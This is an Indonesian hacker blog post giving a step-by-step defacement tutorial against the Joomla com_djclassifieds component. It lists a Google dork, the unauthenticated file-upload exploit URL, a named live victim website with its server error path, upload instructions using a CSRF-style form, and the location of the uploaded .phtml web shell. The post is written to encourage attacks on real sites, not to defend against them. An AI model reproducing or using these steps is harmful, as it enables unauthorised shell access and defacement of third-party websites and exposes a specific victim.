Label
Diposting oleh

Cara Deface Poc com_djclassifieds atau Zicepanel

Kembali lagi Bersama Saya ./DarkSkull7 Gans:v
Kali Ini saya akan memberi Sedikit Turtorial 

Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v



Bahan-bahan :



Dork: inurl:=com_djclassifieds 

        ( Use your brain )



Exploit :

index.php?option=com_djclassifieds&task=upload&tmpl=component


Live Target : http://grupoposgar.es/

Csrf  type " file " > DISINI :D


Step by step :

1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step .



2 . jangan lupa masukkan exploit nya .

http://grupoposgar.es/index.php?option=com_djclassifieds&task=upload&tmpl=component

3 . jika vlun ada tulisan , seperti gambar di bawah .



Notice: Undefined variable: contentType in /homepages/41/d603710153/htdocs/Posgar_2/administrator/components/com_djclassifieds/lib/djupload.php on line 320
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

4 . gunakan csrf nya dan upload file .



5 jika berhasil berhasil kembali ke tulisan vlun pertama / {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



DONE

Akses Shell:
http://website.site/tmp/djupload/namafile.phtml/PhP

Note: ext harus phtml dan PhP

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian
Jangan Lupa Di Share ya cuk
Posting Email
Labels:
Gua DarkSkull7 ( Dimas )

Komentar

Posting Komentar

XDarkSkull7X

Postingan Populer